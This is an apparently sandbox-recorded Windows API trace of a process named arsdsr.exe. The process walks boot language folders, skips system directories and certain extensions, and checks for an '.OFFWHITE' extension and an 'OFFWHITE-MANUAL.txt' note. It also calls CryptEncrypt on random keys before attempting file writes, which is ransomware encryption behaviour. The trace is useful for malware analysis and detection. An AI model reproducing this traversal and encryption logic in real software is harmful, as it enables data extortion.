lstrcmpiW (lpString1="nl-NL", lpString2="$recycle.bin") returned 1 [0082.298] lstrcmpiW (lpString1="nl-NL", lpString2="rsa") returned -1 [0082.298] lstrcmpiW (lpString1="nl-NL", lpString2="ntuser.dat") returned -1 [0082.298] lstrcmpiW (lpString1="nl-NL", lpString2="programdata") returned -1 [0082.298] lstrcmpiW (lpString1="nl-NL", lpString2="appdata") returned 1 [0082.298] lstrcmpiW (lpString1="nl-NL", lpString2="program files") returned -1 [0082.298] lstrcmpiW (lpString1="nl-NL", lpString2="program files (x86)") returned -1 [0082.298] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.298] lstrcatW (in: lpString1="C:/Boot\\", lpString2="nl-NL" | out: lpString1="C:/Boot\\nl-NL") returned="C:/Boot\\nl-NL" [0082.298] lstrcatW (in: lpString1="C:/Boot\\nl-NL", lpString2="\\" | out: lpString1="C:/Boot\\nl-NL\\") returned="C:/Boot\\nl-NL\\" [0082.298] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\nl-NL\\" | out: lpString1="C:/Boot\\nl-NL\\") returned="C:/Boot\\nl-NL\\" [0082.298] lstrcatW (in: lpString1="C:/Boot\\nl-NL\\", lpString2="*.*" | out: lpString1="C:/Boot\\nl-NL\\*.*") returned="C:/Boot\\nl-NL\\*.*" [0082.298] FindFirstFileW (in: lpFileName="C:/Boot\\nl-NL\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.299] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.299] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.299] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.299] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.299] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.299] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.299] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.299] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.299] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.299] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.299] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.299] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.299] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.299] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.299] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.299] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.299] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\nl-NL\\" | out: lpString1="C:/Boot\\nl-NL\\") returned="C:/Boot\\nl-NL\\" [0082.299] lstrcatW (in: lpString1="C:/Boot\\nl-NL\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\nl-NL\\bootmgr.exe.mui") returned="C:/Boot\\nl-NL\\bootmgr.exe.mui" [0082.299] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.299] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.299] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.299] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.300] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.300] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.300] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.300] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.300] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.300] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.300] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.300] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.300] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.300] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.300] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.300] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.300] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.300] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.300] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.300] GetProcessHeap () returned 0x500000 [0082.300] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bc90 [0082.301] CreateFileW (lpFileName="C:/Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.301] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.301] GetProcessHeap () returned 0x500000 [0082.301] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548580 [0082.301] GetProcessHeap () returned 0x500000 [0082.301] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548460 [0082.301] GetProcessHeap () returned 0x500000 [0082.301] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x520d50 [0082.301] GetProcessHeap () returned 0x500000 [0082.301] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x520e58 [0082.301] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.301] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.301] SystemFunction036 (in: RandomBuffer=0x548580, RandomBufferLength=0x10 | out: RandomBuffer=0x548580) returned 1 [0082.301] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.301] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.301] SystemFunction036 (in: RandomBuffer=0x548460, RandomBufferLength=0x10 | out: RandomBuffer=0x548460) returned 1 [0082.301] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.301] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.301] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x520d50*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x520d50*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.302] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.302] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.302] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x520e58*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x520e58*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.302] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.302] SetLastError (dwErrCode=0x0) [0082.302] WriteFile (in: hFile=0xffffffff, lpBuffer=0x520d50, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.302] GetLastError () returned 0x6 [0082.302] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.302] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.302] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0082.302] lstrcmpiW (lpString1="pl-PL", lpString2=".") returned 1 [0082.302] lstrcmpiW (lpString1="pl-PL", lpString2="..") returned 1 [0082.302] lstrcmpiW (lpString1="pl-PL", lpString2="...") returned 1 [0082.302] lstrcmpiW (lpString1="pl-PL", lpString2="windows") returned -1 [0082.302] lstrcmpiW (lpString1="pl-PL", lpString2="$recycle.bin") returned 1 [0082.303] lstrcmpiW (lpString1="pl-PL", lpString2="rsa") returned -1 [0082.303] lstrcmpiW (lpString1="pl-PL", lpString2="ntuser.dat") returned 1 [0082.303] lstrcmpiW (lpString1="pl-PL", lpString2="programdata") returned -1 [0082.303] lstrcmpiW (lpString1="pl-PL", lpString2="appdata") returned 1 [0082.303] lstrcmpiW (lpString1="pl-PL", lpString2="program files") returned -1 [0082.303] lstrcmpiW (lpString1="pl-PL", lpString2="program files (x86)") returned -1 [0082.303] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.303] lstrcatW (in: lpString1="C:/Boot\\", lpString2="pl-PL" | out: lpString1="C:/Boot\\pl-PL") returned="C:/Boot\\pl-PL" [0082.303] lstrcatW (in: lpString1="C:/Boot\\pl-PL", lpString2="\\" | out: lpString1="C:/Boot\\pl-PL\\") returned="C:/Boot\\pl-PL\\" [0082.303] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\pl-PL\\" | out: lpString1="C:/Boot\\pl-PL\\") returned="C:/Boot\\pl-PL\\" [0082.303] lstrcatW (in: lpString1="C:/Boot\\pl-PL\\", lpString2="*.*" | out: lpString1="C:/Boot\\pl-PL\\*.*") returned="C:/Boot\\pl-PL\\*.*" [0082.303] FindFirstFileW (in: lpFileName="C:/Boot\\pl-PL\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.303] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.303] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.303] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.303] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.304] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.304] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.304] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.304] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.304] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.304] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.304] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.304] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.304] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.304] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.304] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.304] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.304] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\pl-PL\\" | out: lpString1="C:/Boot\\pl-PL\\") returned="C:/Boot\\pl-PL\\" [0082.304] lstrcatW (in: lpString1="C:/Boot\\pl-PL\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\pl-PL\\bootmgr.exe.mui") returned="C:/Boot\\pl-PL\\bootmgr.exe.mui" [0082.304] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.304] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.304] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.304] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.304] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.304] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.304] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.304] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.304] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.304] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.304] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.305] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.305] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.305] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.305] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.305] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.305] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.305] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.305] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.305] GetProcessHeap () returned 0x500000 [0082.305] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bca0 [0082.305] CreateFileW (lpFileName="C:/Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.307] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.307] GetProcessHeap () returned 0x500000 [0082.307] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548490 [0082.307] GetProcessHeap () returned 0x500000 [0082.307] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548478 [0082.307] GetProcessHeap () returned 0x500000 [0082.307] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x520f60 [0082.307] GetProcessHeap () returned 0x500000 [0082.307] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x521068 [0082.307] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.307] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.307] SystemFunction036 (in: RandomBuffer=0x548490, RandomBufferLength=0x10 | out: RandomBuffer=0x548490) returned 1 [0082.307] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.307] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.307] SystemFunction036 (in: RandomBuffer=0x548478, RandomBufferLength=0x10 | out: RandomBuffer=0x548478) returned 1 [0082.307] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.307] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.307] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x520f60*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x520f60*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.308] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.308] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.308] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x521068*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x521068*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.308] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.308] SetLastError (dwErrCode=0x0) [0082.308] WriteFile (in: hFile=0xffffffff, lpBuffer=0x520f60, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.308] GetLastError () returned 0x6 [0082.308] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.308] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.308] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0082.308] lstrcmpiW (lpString1="pt-BR", lpString2=".") returned 1 [0082.308] lstrcmpiW (lpString1="pt-BR", lpString2="..") returned 1 [0082.308] lstrcmpiW (lpString1="pt-BR", lpString2="...") returned 1 [0082.309] lstrcmpiW (lpString1="pt-BR", lpString2="windows") returned -1 [0082.309] lstrcmpiW (lpString1="pt-BR", lpString2="$recycle.bin") returned 1 [0082.309] lstrcmpiW (lpString1="pt-BR", lpString2="rsa") returned -1 [0082.309] lstrcmpiW (lpString1="pt-BR", lpString2="ntuser.dat") returned 1 [0082.309] lstrcmpiW (lpString1="pt-BR", lpString2="programdata") returned 1 [0082.309] lstrcmpiW (lpString1="pt-BR", lpString2="appdata") returned 1 [0082.309] lstrcmpiW (lpString1="pt-BR", lpString2="program files") returned 1 [0082.309] lstrcmpiW (lpString1="pt-BR", lpString2="program files (x86)") returned 1 [0082.309] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.309] lstrcatW (in: lpString1="C:/Boot\\", lpString2="pt-BR" | out: lpString1="C:/Boot\\pt-BR") returned="C:/Boot\\pt-BR" [0082.309] lstrcatW (in: lpString1="C:/Boot\\pt-BR", lpString2="\\" | out: lpString1="C:/Boot\\pt-BR\\") returned="C:/Boot\\pt-BR\\" [0082.309] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\pt-BR\\" | out: lpString1="C:/Boot\\pt-BR\\") returned="C:/Boot\\pt-BR\\" [0082.309] lstrcatW (in: lpString1="C:/Boot\\pt-BR\\", lpString2="*.*" | out: lpString1="C:/Boot\\pt-BR\\*.*") returned="C:/Boot\\pt-BR\\*.*" [0082.309] FindFirstFileW (in: lpFileName="C:/Boot\\pt-BR\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.309] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.309] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.310] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.310] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.310] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.310] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.310] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.310] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.310] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.310] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.310] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.310] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.310] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.310] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.310] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.310] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.310] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\pt-BR\\" | out: lpString1="C:/Boot\\pt-BR\\") returned="C:/Boot\\pt-BR\\" [0082.310] lstrcatW (in: lpString1="C:/Boot\\pt-BR\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\pt-BR\\bootmgr.exe.mui") returned="C:/Boot\\pt-BR\\bootmgr.exe.mui" [0082.310] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.310] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.310] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.310] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.310] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.310] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.310] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.310] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.310] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.311] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.311] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.311] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.311] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.311] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.311] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.311] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.311] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.311] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.311] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.311] 